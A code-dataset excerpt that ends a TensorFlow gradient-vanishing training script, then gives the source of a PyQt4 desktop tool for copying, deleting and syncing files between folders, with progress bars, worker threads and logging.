Y: batch_ts})
_, grad_wrt_weight_layer2 = sess.run([optimizer,grad_wrt_weight_layer2_tensor], feed_dict={X: batch_xs,
Y: batch_ts})
_, grad_wrt_weight_layer3 = sess.run([optimizer,grad_wrt_weight_layer3_tensor], feed_dict={X: batch_xs,
Y: batch_ts})
_, grad_wrt_weight_layer4 = sess.run([optimizer,grad_wrt_weight_layer4_tensor], feed_dict={X: batch_xs,
Y: batch_ts})
_, grad_wrt_weight_layer5 = sess.run([optimizer,grad_wrt_weight_layer5_tensor], feed_dict={X: batch_xs,
Y: batch_ts})
grad_wrt_weight_layer1 = np.array(grad_wrt_weight_layer1)
grad_wrt_weight_layer2 = np.array(grad_wrt_weight_layer2)
grad_wrt_weight_layer3 = np.array(grad_wrt_weight_layer3)
grad_wrt_weight_layer4 = np.array(grad_wrt_weight_layer4)
grad_wrt_weight_layer5 = np.array(grad_wrt_weight_layer5)
grad_wrt_weight_layer1 = grad_wrt_weight_layer1.reshape(grad_wrt_weight_layer1.shape[1],
grad_wrt_weight_layer1.shape[2])
grad_wrt_weight_layer2 = grad_wrt_weight_layer2.reshape(grad_wrt_weight_layer2.shape[1],
grad_wrt_weight_layer2.shape[2])
grad_wrt_weight_layer3 = grad_wrt_weight_layer3.reshape(grad_wrt_weight_layer3.shape[1],
grad_wrt_weight_layer3.shape[2])
grad_wrt_weight_layer4 = grad_wrt_weight_layer4.reshape(grad_wrt_weight_layer4.shape[1],
grad_wrt_weight_layer4.shape[2])
grad_wrt_weight_layer5 = grad_wrt_weight_layer5.reshape(grad_wrt_weight_layer5.shape[1],
grad_wrt_weight_layer5.shape[2])
grad_wrt_weight_layer1_iter[i] = grad_wrt_weight_layer1.mean()
grad_wrt_weight_layer2_iter[i] = grad_wrt_weight_layer2.mean()
grad_wrt_weight_layer3_iter[i] = grad_wrt_weight_layer3.mean()
grad_wrt_weight_layer4_iter[i] = grad_wrt_weight_layer4.mean()
grad_wrt_weight_layer5_iter[i] = grad_wrt_weight_layer5.mean()
# Compute average loss
avg_cost += local_batch_cost / total_batch
# print ("At %d-th batch in %d-epoch, avg_cost = %f" % (i,epoch,avg_cost) )
# Display logs per epoch step
if display_step == 0:
continue
elif (epoch + 1) % display_step == 0:
# print("Iteration:", '%04d' % (epoch + 1), "cost=", "{:.9f}".format(avg_cost))
batch_train_xs = x_training_data
batch_train_ys = t_training_data
batch_valid_xs = x_validation_data
batch_valid_ys = t_validation_data
errRateTraining[epoch] = 1.0 - accuracy.eval({X: batch_train_xs, \
Y: batch_train_ys}, session=sess)
errRateValidation[epoch] = 1.0 - accuracy.eval({X: batch_valid_xs, \
Y: batch_valid_ys}, session=sess)
print("Training set Err rate: %s" % errRateTraining[epoch])
print("Validation set Err rate: %s" % errRateValidation[epoch])
print("--------------------------------------------")
print("Optimization Finished!")
# Training result visualization ===============================================
hfig2 = plt.figure(2,figsize=(10,10))
batch_index = np.array([elem for elem in range(total_batch)])
plt.plot(batch_index,grad_wrt_weight_layer1_iter,label='layer1',color='b',marker='o')
plt.plot(batch_index,grad_wrt_weight_layer4_iter,label='layer4',color='y',marker='o')
plt.plot(batch_index,grad_wrt_weight_layer5_iter,label='layer5',color='r',marker='o')
plt.legend()
plt.title('Weight Gradient over minibatch iter @ training epoch = %s' % training_epochs)
plt.xlabel('minibatch iter')
plt.ylabel('Weight Gradient')
plt.show() | jwkanggist/EveryBodyTensorFlow | lab7_runTFcheckGradientVanishing_spiraldata.py | Python | unlicense | 11,985 | [
"NEURON"
] | b2854dfc14464ada2aea939898feab72dbe48137272f19cf0da0a4b65f8dacbd |
import sys, os
import pickle
import threading
from PyQt4.QtGui import *
from PyQt4.QtCore import *
#Contains File Actions
from sync import *
#Contain Variables for file action, dock checkboxes and objects
from env import *
#Contains Filetype Variables
from env2 import *
#Contain Progress Related Variables
from env_progress import *
#Contains disk detail creation function
from disk_detail import *
#Contains File types list creation function
from make_dock2 import *
#Location define Window
from set_dict import *
#Log Window
from log import *
#StyleSheet
from style1 import *
from copy_confirm import *
from fetching import *
from fetch import *
from wrapper import *
"""
Signals for progress function update
"""
class signal(QObject):
text_browser = pyqtSignal() #Text Browser Signal
prog_bar = pyqtSignal() #ProgressBar Signal
prog_lab = pyqtSignal() #Progress Label Signal
stat_bar = pyqtSignal() #StatusBar Signal
dock1 = pyqtSignal() #Disk Detail Signal
"""
Centre Widgets for MainWindow
"""
class centre(QWidget):
def __init__(self):
super(centre, self).__init__()
log_file = open(rec_log, "a+")
line = "\n\n\n\n-----------------------------------------------------------------------\n"
log_file.writelines(line)
line = "[" + str(time.asctime()) + "] program started setting up window\n"
log_file.writelines(line)
try:
"""
Start handling dock2 treewidget signal
-1: TreeWidget not Created
0: Creating TreeWidget, No Signal Processed
2: TreeWidget Created, Signal will be processed
"""
self.start_handle1 = -1
"""
Fetch Function Has Been Called or Not
0: Not Called
1: Straight Fetch Called
2: Reverse Fetch Called
"""
self.fetched = 0
#Connecting Signals To Handlers
self.sig = signal()
self.sig.prog_bar.connect(lambda: self.update_progbar())
self.sig.prog_lab.connect(lambda: self.update_proglab())
self.sig.stat_bar.connect(lambda: self.update_statbar())
#self.sig.text_browser.connect(lambda: self.update_text1())
self.sig.dock1.connect(lambda: self.make_dock1())
#Load Pickled Lists
self.loadlist()
#Create Centre Widgets
self.set_centre()
self.sig.text_browser.connect(lambda: self.update_text1())
#Get Functions From MainWindow
self.get_functions()
#Update Dock3 with Source Folder
self.update_dock3()
#Thread to Update ProgressBar, StatusBar, Progress Label and Disk Detail
self.prog_thread = threading.Thread(target = self.start_thread, args = ())
self.prog_thread.daemon = True
self.prog_thread.start()
#Thread To Perform File Actions
self.action_thread = threading.Thread(target = self.file_action, args = ())
self.action_thread.daemon = True
self.action_thread.start()
line = "[" + str(time.asctime()) + "] window set up completed successfully\n\n"
log_file.writelines(line)
log_file.close()
except:
line = "[" + str(time.asctime()) + "] failed to setup window!!!CLOSING\n\n"
log_file.writelines(line)
log_file.close()
def loadlist(self):
try:
list1 = pickle.load(open("setting/all_list.p", "rb"))
list2 = pickle.load(open("setting/list_name.p", "rb"))
list3 = pickle.load(open("setting/left_check.p", "rb"))
list4 = pickle.load(open("setting/top_check.p", "rb"))
for item in list1:
all_list.append(item) #Variable at Line 81 in env
for item in list2:
list_name.append(item) #Variable at Line 83 in env
for item in list3:
left_check.append(item) #Variable at Line 76 in env
for item in list4:
top_check.append(item) #Variable at Line 78 in env
self.make_synclist()
except:
print(sys.exc_info())
pass
"""
TEXT1[0] = "Press A Button To Start Any Job"
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
"""
def make_synclist(self):
tmp_list = []
i = 0
while(i < len(all_list)):
j = 0
while(j < len(all_list[i])):
#If Checked add to sync list
if(top_check[i][j] == 1):
tmp_list.append(all_list[i][j])
j = j + 1
i = i + 1
#sync_list.clear()
#sync_list = []
clear_list([sync_list]);
for item in tmp_list:
sync_list.append(item)
self.make_rev_list() #Make List For Reverse Copy
if(len(sync_list) == 0):
TEXT3[0] = "No Locations Defined"
self.sig.stat_bar.emit()
TEXT1[0] = "Define Locations"
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
def get_functions(self):
#Update Dock3
self.update_right_dock = getattr(central, "update_right_dock")
#Lock Dock3 when file operations going on
self.lock_right = getattr(central, "lock_right")
def set_centre(self):
dictionary = QPushButton("LOCATION")
self.make_button(dictionary, "", "", self.dict)
dictionary.setMinimumHeight(50)
self.fetch1 = QPushButton("FETCH")
self.make_button(self.fetch1, "", "", self.fetch_btn)
self.fetch1.setMinimumHeight(50)
self.copy1 = QPushButton("COPY 1-2")
self.make_button(self.copy1, "", "", self.copy12)
self.copy1.setMinimumHeight(50)
self.copy2 = QPushButton("COPY 2-1")
self.make_button(self.copy2, "", "", self.copy21)
self.copy2.setMinimumHeight(50)
self.del1 = QPushButton("DELETE 1")
self.make_button(self.del1, "", "", self.delete1)
self.del1.setMinimumHeight(50)
self.del2 = QPushButton("DELETE 2")
self.make_button(self.del2, "", "", self.delete2)
self.del2.setMinimumHeight(50)
self.sync1 = QPushButton("SYNC")
self.make_button(self.sync1, "", "", self.sync)
self.sync1.setMinimumHeight(50)
log = QPushButton("LOG")
self.make_button(log, "", "", self.log)
log.setMinimumHeight(50)
#Set StyleSheet
but_obj = [dictionary, self.fetch1, self.copy1, self.copy2, self.del1, self.del2, self.sync1, log]
set_style(but_obj, "button")
self.dock1 = QDockWidget("", self)
self.dock1.setFeatures(QDockWidget.NoDockWidgetFeatures)
self.make_dock1()
self.dock2 = QDockWidget("", self)
self.dock2.setFeatures(QDockWidget.NoDockWidgetFeatures)
self.make_dock2()
self.text_box = QTextBrowser()
set_style(self.text_box, "text_browser")
self.progress_text = QLabel("\t| COPY | Files: 000/000\tAmount: 0000/0000(MB)\t\t\t| DELETE | Files: 000/000\tAmount: 0000/0000(MB)")
set_style(self.progress_text, "prog_lab")
self.pbar = QProgressBar(self)
set_style(self.pbar, "prog_bar")
self.pbar.setValue(0)
self.progress_text.setMaximumHeight(20)
self.pbar.setMaximumHeight(25)
grid = QGridLayout()
grid.setSpacing(0)
grid.addWidget(dictionary, 0, 0)
grid.addWidget(self.fetch1, 0, 1)
grid.addWidget(self.copy1, 0, 2)
grid.addWidget(self.copy2, 0, 3)
grid.addWidget(self.del1, 0, 4)
grid.addWidget(self.del2, 0, 5)
grid.addWidget(self.sync1, 0, 6)
grid.addWidget(log, 0, 7)
grid.addWidget(self.dock1, 3, 0, 5, 4)
grid.addWidget(self.dock2, 3, 4, 9, 4)
grid.addWidget(self.text_box, 8, 0, 4, 4)
grid.addWidget(self.progress_text, 12, 0, 1, 8)
grid.addWidget(self.pbar, 13, 0, 1, 8)
self.setLayout(grid)
TEXT3[0] = "Press A Button To Start Any Job"
self.sig.stat_bar.emit()
def update_sec_dock(self, action):
self.start_handle1 = 0 #Stop Processing Signals emitted due to change in treewidget
if(action == "copy"):
tree = self.tree2
file_cat = cp_filetype #Variable at Line 27 in env2
#left_cp_obj.clear()
#left_cp_obj = []
clear_list([left_cp_obj]);
obj_list = left_cp_obj #Variable at Line 87 in env
#cp_map.clear()
#cp_map = []
clear_list([cp_map]);
maps = cp_map #Variable at Line 92 in env
if(action == "del"):
tree = self.del_tree
file_cat = del_filetype #Variable at Line 30 in env2
#left_del_obj.clear()
#left_del_obj = []
clear_list([left_del_obj]);
obj_list = left_del_obj #Variable at Line 88 in env2
#del_map.clear()
#del_map= []
clear_list([del_map]);
maps = del_map #Variable at Line 93 in env2
if(action == "copy"):
for i in range(len(cp_filetype)):
#cp_filetype[i].clear()
#cp_filetype[i] = []
clear_list([cp_filetype[i]]);
make_fcategory(self, cp_file_from, "copy") #Function at Line 22 in make_dock2
if(action == "del"):
for i in range(len(del_filetype)):
#del_filetype[i].clear()
#del_filetype[i] = []
clear_list([del_filetype[i]]);
make_fcategory(self, del_file_from, "del") #Function at Line 22 in make_dock2
tree.clear()
i = 0
for item in file_cat:
out_list = []
out_map = []
heading = type_name[i] + "(" + str(len(file_cat[i])) + ")"
head = QTreeWidgetItem(tree, [heading])
out_list.append(head)
out_map.append(-1)
head.setCheckState(0, Qt.Checked)
head.setExpanded(True)
if(len(item) == 0):
head.setDisabled(True)
head.setCheckState(0, Qt.Unchecked)
for fname in file_cat[i]:
size = fname[1]
unit = ""
if size < 1000:
size = size
unit = "Bytes"
if size < 1000000:
size = size / 1000
unit = "KB"
if size > 1000000:
size = size / 1000000
unit = "MB"
tmp_size = str(size)
tmp_size = tmp_size.split('.')
fsize = tmp_size[0] + '.' + tmp_size[1][:1] + unit
tail = QTreeWidgetItem(head, [fname[0], fsize, fname[2]])
out_list.append(tail)
out_map.append(fname[3])
tail.setCheckState(0, Qt.Checked)
obj_list.append(out_list)
maps.append(out_map)
i = i + 1
self.start_handle1= 2 #Start Processing changes made to treewidget
def make_dock1(self):
frame = QFrame()
frame.setFrameShape(QFrame.StyledPanel)
grid = QGridLayout()
show_disk(centre)
i = 0
j = 0
while i < len(disk_info):
detail = ""
disk_label = QLabel(disk_info[i][0])
disk_label.setStyleSheet("QLabel {font : Normal 14px 'Serif'; color : rgb(86, 90, 85); background-color : 0;}")
disk_label.setMaximumWidth(150)
bar = QProgressBar()
set_style(bar, "disk_bar")
bar.setValue((disk_info[i][2] / disk_info[i][1]) * 100)
total = str(disk_info[i][1]).split('.')
total = total[0] + "." + total[-1][:1]
used = str(disk_info[i][2]).split('.')
used = used[0] + "." + used[-1][:1]
avail = str(disk_info[i][3]).split('.')
avail = avail[0] + "." + avail[-1][:1]
detail = "Total: " + total + "GB Used: " + used + "GB Available: " + avail + "GB"
det = QLabel(detail)
det.setStyleSheet("QLabel {font : Normal 12px 'Monospace'; color : rgb(38, 97, 94);}")
det.setMaximumHeight(10)
grid.addWidget(bar, j, 0, 1, 6)
grid.addWidget(disk_label, j, 1)
j = j + 1
grid.addWidget(det, j, 0)
j = j + 1
i = i + 1
space = QLabel("\n\n\n\n")
grid.addWidget(space, j, 0)
frame.setLayout(grid)
self.dock1.setWidget(frame)
def update_dock3(self):
if(len(sync_list) == 0):
return
tmp = []
for item in sync_list:
tmp.append(item['source'])
tmp.sort()
self.update_right_dock(self, tmp, "copy")
self.update_right_dock(self, tmp, "del")
def make_button(self, item, text = "", icon = None, handle = None):
item.setIcon(QIcon(icon))
item.setIconSize(QSize(50, 50))
item.connect(item, SIGNAL("clicked()"), handle)
def make_dock2(self):
self.dock2.setMaximumWidth(500)
self.dock2.setMinimumWidth(500)
self.dock2.setObjectName("Log Dock")
self.dock2.isEnabled
self.tree2 = QTreeWidget()
self.tree2.setFocusPolicy(Qt.NoFocus)
set_style(self.tree2, "tree")
self.tree2.setHeaderHidden(True)
self.tree2.setColumnCount(3)
self.tree2.setColumnWidth(0, 300)
self.tree2.setColumnWidth(1, 80)
self.tree2.setColumnWidth(2, 80)
self.tree2.itemChanged.connect(lambda ob = self : self.left_tick_handle(ob, "copy"))
self.del_tree = QTreeWidget()
self.del_tree.setFocusPolicy(Qt.NoFocus)
set_style(self.del_tree, "tree")
self.del_tree.setHeaderHidden(True)
self.del_tree.itemChanged.connect(lambda ob = self : self.left_tick_handle(ob, "del"))
self.del_tree.setColumnCount(3)
self.del_tree.setColumnWidth(0, 260)
tab = QTabWidget()
tab.setFocusPolicy(Qt.NoFocus)
tab1 = QWidget()
tab2 = QWidget()
txt1 = "FILES TO COPY"
txt2 = "FILES TO DELETE"
tab.addTab(tab1, txt1)
tab.addTab(tab2, txt2)
#Set StyleSheet
set_style(tab, "left_tab")
cp_grid = QGridLayout()
del_grid = QGridLayout()
cp_grid.addWidget(self.tree2, 0, 0)
del_grid.addWidget(self.del_tree, 0, 0)
tab1.setLayout(cp_grid)
tab2.setLayout(del_grid)
self.dock2.setWidget(tab)
self.update_sec_dock("copy")
self.update_sec_dock("del")
def left_tick_handle(self, ob, action):
if(self.start_handle1 == 2):
if(action == "copy"):
tree = self.tree2
obj_list = left_cp_obj #Variable at Line 87 in env
TOT_FILE = TOT_CP_FILE #Variable at Line 16 in env_progress
if(action == "del"):
tree = self.del_tree
obj_list = left_del_obj #Variable at Line 87 in env
TOT_FILE = TOT_DEL_FILE #Variable at Line 7 in env_progress
tree.blockSignals(True) #Block Other Signals to tree
out_len = len(obj_list)
outer_index = 0
flag = 0
in_index = 0
#Finding index of the object in object_list
while(outer_index < out_len):
in_index = 0
in_len = len(obj_list[outer_index])
while(in_index < in_len):
if(obj_list[outer_index][in_index] == ob):
flag = 1
break
in_index = in_index + 1
if(flag):
break
outer_index = outer_index + 1
if(in_index == 0): #It is a head and checked
if(ob.checkState(0) == Qt.Checked):
obj_list[outer_index][0].setCheckState(0, Qt.Checked)
size = len(obj_list[outer_index])
i = 1
#Check Every Tail
while(i < size):
if(obj_list[outer_index][i].checkState(0) == Qt.Unchecked):
obj_list[outer_index][i].setCheckState(0, Qt.Checked)
TOT_FILE[0] = TOT_FILE[0] + 1
self.handle_right(obj_list[outer_index][i], action) #Reflect change to Tree in Dock3 func at Line 431
i = i + 1
tree.blockSignals(False) #No more block signals from tree
return
if(ob.checkState(0) == Qt.Unchecked): #It is a head and unchecked
obj_list[outer_index][0].setCheckState(0, Qt.Unchecked)
size = len(obj_list[outer_index])
i = 1
#Uncheck Every Tail
while(i < size):
if(obj_list[outer_index][i].checkState(0) == Qt.Checked):
obj_list[outer_index][i].setCheckState(0, Qt.Unchecked)
TOT_FILE[0] = TOT_FILE[0] - 1
self.handle_right(obj_list[outer_index][i], action) #Reflect change to Tree in Dock3 func at Line 431
i = i + 1
tree.blockSignals(False) #No more block signals from tree
return
if(ob.checkState(0) == Qt.Checked): #It is Tail and Checked
if(obj_list[outer_index][0].checkState(0) == Qt.Unchecked):
obj_list[outer_index][0].setCheckState(0, Qt.Checked)
TOT_FILE[0] = TOT_FILE[0] + 1
self.handle_right(ob, action) #Reflect change to Tree in Dock3 func at Line 431
tree.blockSignals(False) #No more block signals from tree
return
if(ob.checkState(0) == Qt.Unchecked): #It is Tail and Unchecked
TOT_FILE[0] = TOT_FILE[0] - 1
size = len(obj_list[outer_index])
i = 1
flag = 0
#Check If all tail of this head are unchecked
while i < size:
if(obj_list[outer_index][i].checkState(0) == Qt.Checked):
flag = 1
break
i = i + 1
if(not flag): #All tails are Unchecked
obj_list[outer_index][0].setCheckState(0, Qt.Unchecked)
self.handle_right(ob, action) #Reflect change to Tree in Dock3 func at Line 431
tree.blockSignals(False) #No more block signals from tree
return
"""
It reflect changes made in dock2 to dock3 by calling dock3 handler function
"""
def handle_right(self, ob, action):
if(action == "copy"):
left = left_cp_flist #Variable at Line 100 in env
right = right_cp_flist #Variable at Line 104 in env
file_from = cp_file_from #Variable at Line 43 in env
F_SIZE = TOT_CP_AMT #Variable at Line 20 in env_progress
if(action == "del"):
left = left_del_flist #Variable at Line 101 in env
right = right_del_flist #Variable at Line 105 in env
file_from = del_file_from #Variable at Line 50 in env
F_SIZE = TOT_DEL_AMT #Variable at Line 11 in env_progress
i = 0
#Search index of object in object list
size = len(left)
while(i < size):
if(left[i] == ob):
break
i = i + 1
s = os.path.getsize(file_from[i])
if(left[i].checkState(0) == Qt.Checked):
F_SIZE[0] = F_SIZE[0] + s / 1000000
right[i].setCheckState(0, Qt.Checked) #Right treewidget handler called
if(left[i].checkState(0) == Qt.Unchecked):
F_SIZE[0] = F_SIZE[0] - s / 1000000
right[i].setCheckState(0, Qt.Unchecked) #Right treewidget handler called
text4 = ("\t<COPY>Files: 000/%d\tAmount: 0000/%d(MB)\t\t\t<DELETE>Files: 000/%d\tAmount: 0000/%d(MB)" %(TOT_CP_FILE[0], TOT_CP_AMT[0], TOT_DEL_FILE[0], TOT_DEL_AMT[0]))
TEXT2[0] = text4
self.sig.prog_lab.emit()
TEXT3[0] = ("%d Files To Copy and %d Files To Delete" %(TOT_CP_FILE[0], TOT_DEL_FILE[0]))
self.sig.stat_bar.emit()
"""
Update window when there is no file to copy or delete
"""
def nofile(self):
#Update Dock3 With Source Folder Only
tmp = []
for item in sync_list:
tmp.append(item['source'])
tmp.sort()
self.update_right_dock(self, tmp, "copy")
self.update_right_dock(self, tmp, "del")
self.update_sec_dock("copy")
self.update_sec_dock("del")
TEXT3[0] = "No Files To Take Action"
TEXT1[0] = "No Files Left To Perform Next Task"
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
self.sig.stat_bar.emit()
"""
If there is no item in dictionary to fetch files from
"""
def target_empty(self, fetch_list):
if(len(fetch_list) == 0):
self.clear_list()
inst = central()
self.update_right_dock(inst, cp_file_from, "copy")
self.update_right_dock(inst, del_file_from, "del")
self.update_sec_dock("copy")
self.update_sec_dock("del")
TEXT1[0] = "Define Locations With LOCATION Button On Left"
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
line = "------------------------------------------------------"
TEXT1[0] = line
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
TEXT3[0] = "No Locations Defined"
self.sig.stat_bar.emit()
return 0
return 1
"""
List required to be cleared for fetching process otherwise lists will be appended
List Variable at Line 55 in env
"""
def clear_list(self):
list_size = len(lists)
for i in range(list_size):
#lists[i].clear()
#lists[i] = []
clear_list([lists[i]]);
def fetch_btn(self):
self.call_fetch_btn(1)
def call_fetch_btn(self, i):
msg = "Are You Sure To Start\nFetchin Process"
reply = QMessageBox.question(self, 'Message', msg, QMessageBox.Yes, QMessageBox.No)
if(reply == QMessageBox.No):
return
self.clear_list() #Clear lists requred to store file and directory names
if(i == 1):
if(not self.target_empty(sync_list)): #Check If There is no location in dictionary
return
FETCH[0] = i
ACTION[0] = "fetch1"
if(i == 2):
if(not self.target_empty(rev_list)): #Check If There is no location in dictionary
return
FETCH[0] = i
ACTION[0] = "fetch2"
self.show_busy()
self.after_fetch()
def after_fetch(self):
os.chdir(curr)
self.update_right_dock(self, cp_file_from, "copy")
self.update_right_dock(self, del_file_from, "del")
self.update_sec_dock("copy")
self.update_sec_dock("del")
self.make_mapping("copy")
self.make_mapping("del")
TEXT2[0] = ("\t<COPY>Files: 000/%d\tAmount: 0000/%d(MB)\t\t\t<DELETE>Files: 000/%d\tAmount: 0000/%d(MB)" %(TOT_CP_FILE[0], TOT_CP_AMT[0], TOT_DEL_FILE[0], TOT_DEL_AMT[0]))
self.sig.prog_lab.emit()
line = "------------------------------------------------------"
TEXT1[0] = line
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
text1 = str(len(dir2cp)) + " Folders and " + str(len(file2cp)) + " Files To Copy"
TEXT1[0] = text1
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
text2 = str(len(del_dir_from)) + " Folders and " + str(len(del_file_from)) + " Files To Delete"
TEXT1[0] = text2
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
TEXT1[0] = line
BOX_TEXT.append(TEXT1[0])
self.sig.text_browser.emit()
text3 = str(TOT_CP_AMT[0]) + " MB" + " To Copy and "
text4 = str(TOT_DEL_AMT[0]) + " MB" + " To Delete"
TEXT3[0] = text3 + text4
self.sig.stat_bar.emit()
log_file = open(rec_log, "a+")
line = "[" + str(time.asctime()) + "] " + text1 + " and " + text2 + "\n"
log_file.writelines(line)
log_file.close()
#Copy from source to target
def copy12(self):
if(not self.target_empty(sync_list)): #If copy button pressed before fetch button this will do location check
return
if(self.fetched != 1): #If straight fetch not done
self.fetched = 1
self.call_fetch_btn(1) #Fetch
if(not cp_file_from): #If no files to copy
self.nofile() #Update Window
return
msg = "Are You Sure To Start The Copying Process?"
reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if(reply == QMessageBox.No):
return
if(col_cp_src):
self.col_care()
ACTION[0] = "copy12" #Sets environment variable for file action thread to start copy process
#Delete At Target
def delete1(self):
if(not self.target_empty(sync_list)):
return
if(self.fetched != 1):
self.fetched = 1
self.call_fetch_btn(1)
if(not del_file_from):
self.nofile()
return
msg = "Are You Sure To Delete Extra Items From Target?"
reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if(reply == QMessageBox.No):
return
ACTION[0] = "del1"
#Copy from Target to source
def copy21(self):
if(not self.target_empty(sync_list)):
return
if(self.fetched != 2):
self.fetched = 2
self.call_fetch_btn(2)
if(not cp_file_from):
self.nofile()
return
msg = "Are You Sure To Start The Reversed Copying Process?"
reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if(reply == QMessageBox.No):
return
if(col_cp_src):
self.col_care()
ACTION[0] = "copy21"
#Delete At Source
def delete2(self):
if(not self.target_empty(sync_list)):
return
if(self.fetched != 2):
self.fetched = 2
self.call_fetch_btn(2)
if(not del_file_from):
self.nofile()
return
msg = "Are You Sure To Delete Extra Item From Source?"
reply = QMessageBox.question(self, 'Confirm', msg, QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if(reply == QMessageBox.No):
return
ACTION[0] = "del2"
"""
files in copy12 is same as del2
files in copy21 is same as del1
"""
"""
Thread that checks ACTION environment variable every 1 second
and perform action if it is set
"""
def file_action(self):
while True:
if(ACTION[0] == "fetch1"):
self.on_fetch(sync_list)
ACTION[0] = " "
BUSY[0] = " "
continue
if(ACTION[0] == "fetch2"):
self.on_fetch(rev_list)
ACTION[0] = " "
BUSY[0] = " "
continue
if(ACTION[0] == "copy12"):
self.lock_widgets("lock")
mkdir(self, dir2cp)
cp(self, file2cp, cp_file_from)
ACTION[0] = " "
self.lock_widgets("unlock")
self.copy1.setFocus()
continue
if(ACTION[0] == "copy21"):
self.lock_widgets("lock")
mkdir(self, dir2cp)
cp(self, file2cp, cp_file_from)
ACTION[0] = " "
self.lock_widgets("unlock")
self.copy2.setFocus()
continue
if(ACTION[0] == "del1"):
self.lock_widgets("lock")
rm(self, del_file_from)
rmdir(self, del_dir_from)
ACTION[0] = " "
self.lock_widgets("unlock")
self.del1.setFocus()
continue
if(ACTION[0] == "del2"):
self.lock_widgets("lock")
rm(self, del_file_from)
rmdir(self, del_dir_from)
ACTION[0] == " "
self.lock_widgets("unlock")
self.del2.setFocus()
continue
time.sleep(1)
def show_busy(self):
self.splash = busy()
self.splash.resize(150, 150)
desktopRect = QApplication.desktop().availableGeometry(self);
middle = desktopRect.center();
self.splash.move(middle.x() - 200 * 0.5, middle.y() - 200);
pal = QPalette()
pal.setColor(QPalette.Background, Qt.white)
self.splash.setPalette(pal)
self.splash.setWindowFlags(Qt.FramelessWindowHint)
self.splash.exec_()
def col_care(self):
conf_res.clear()
i = 0
j = 0
size = len(col_cp_src)
while(i < size):
if(col_cp_src[i] == cp_file_from[j]):
if(left_cp_flist[j].checkState(0) == Qt.Unchecked):
i = i + 1
j = j + 1
continue
conf_res.append(j)
i = i + 1
j = j + 1
continue
j = j + 1
if(not conf_res):
return
i = 0
while(i < size):
left_cp_flist[conf_res[i]].setCheckState(0, Qt.Unchecked)
i = i + 1
self.get_conf()
def get_conf(self):
conf = cp_conf()
conf.setWindowTitle("File Collision Found")
conf.resize(350, 400)
pal = QPalette()
pal.setColor(QPalette.Background, Qt.white)
conf.setPalette(pal)
conf.exec_()
"""
Locke centre widgets when file action is going on
and unlock it when completed
"""
def lock_widgets(self, action):
if(action == "lock"):
self.tree2.setDisabled(True)
self.del_tree.setDisabled(True)
self.fetch1.setDisabled(True)
self.copy1.setDisabled(True)
self.copy2.setDisabled(True)
self.del1.setDisabled(True)
self.del2.setDisabled(True)
self.sync1.setDisabled(True)
self.lock_right(self, "lock") #Lock dock3
if(action == "unlock"):
self.tree2.setEnabled(True)
self.fetch1.setEnabled(True)
self.copy1.setEnabled(True)
self.copy2.setEnabled(True)
self.del1.setEnabled(True)
self.del2.setEnabled(True)
self.sync1.setEnabled(True)
self.del_tree.setEnabled(True)
self.lock_right(self, "unlock") #Unlock dock3
"""
Make reverse sync list for copy21 and del2
"""
def make_rev_list(self):
#rev_list.clear()
#rev_list = []
clear_list([rev_list]);
for item in sync_list:
#Swap dictionary values
tmp = {'source': "", 'target' : ""}
tmp['source'] = item['target']
tmp['target'] = item['source']
rev_list.append(tmp)
def sync(self):
if(not self.target_empty(sync_list)):
return
self.copy12()
self.delete1()
"""
Location Window Handler
"""
def dict(self):
if(len(all_list) == 0): #If There is no device add a device
text, ok = QInputDialog.getText(self, 'Input Dialog', 'Add a Device(Enter Name of Device):')
if(ok):
list_name.append(text)
all_list.append([{'source' : "", 'target' : ""}])
top_check.append([0])
left_check.append(0)
else:
return
top = set_dict()
top.setWindowTitle("Select Locations")
top.resize(900, 600)
top.exec_()
loc_changed = [0]
if(loc_changed[-1] == 1): #If changes made in location window
if(ACTION[0] == " "):
self.fetched = 1
self.call_fetch_btn(1)
log_file = open(rec_log, "a+")
line = "[" + str(time.asctime()) + "] locations dictionary changed\n"
log_file.writelines(line)
log_file.close()
#loc_changed.clear()
#loc_changed = []
clear_list([loc_changed]);
loc_changed.append(0)
self.make_rev_list()
"""
Progress Thread Handler
Checks if any action going on every 1 seconds
"""
def start_thread(self):
i = 0
while True:
if(ACTION[0] != " "):
#Calls function if file action going on
self.progress_thread()
continue
#Update Dock1 Every 5 seconds
if(i == 5):
self.sig.dock1.emit()
i = 0
time.sleep(1)
i = i + 1
"""
Update Progress and Dock1 untill file action goes on
"""
def progress_thread(self):
#If action is copy
if(ACTION[0] == "copy12" or ACTION[0] == "copy21"):
prev = 0
avg = 0
i = 1
while True:
if(ACTION[0] == " "): #If action completed but progress bar is not 100% due to time lag among two threads
if(VAL[0] != 100):
VAL[0] = 100
TEXT2[0] = ("\tFiles: %d/%d\tAmount: %d/%d(MB)\t\t\t\t\t\tElapsed: %d:%d\tAvg. Speed: %dMBPS" %(CP_FILE[0], TOT_CP_FILE[0], SIZE_COPIED[0], TOT_CP_AMT[0], mins, secs, avg_speed))
TEXT3[0] = "Copying: '%s'(%d/%d)MB 100%%" %(CURR_NAME[0], CURR_SIZE[0], CURR_SIZE[0])
self.sig.prog_bar.emit()
self.sig.prog_lab.emit()
self.sig.stat_bar.emit()
AVG_SPEED[0] = avg_speed
return
try:
cp_amt = (os.path.getsize(CURR_FILE[0])) / 1000000 #Find amount copied for current file
except:
cp_amt = 0
amount = SIZE_COPIED[0] + cp_amt
speed = (amount - prev) * 2
prev = amount
VAL[0] = (amount / TOT_CP_AMT[0]) * 100
PRE_TIME[0] = PRE_TIME[0] + 0.5
mins = PRE_TIME[0] / 60
secs = PRE_TIME[0] % 60
avg = avg + speed
avg_speed = avg / i
if(i % 5 == 0):
self.sig.dock1.emit()
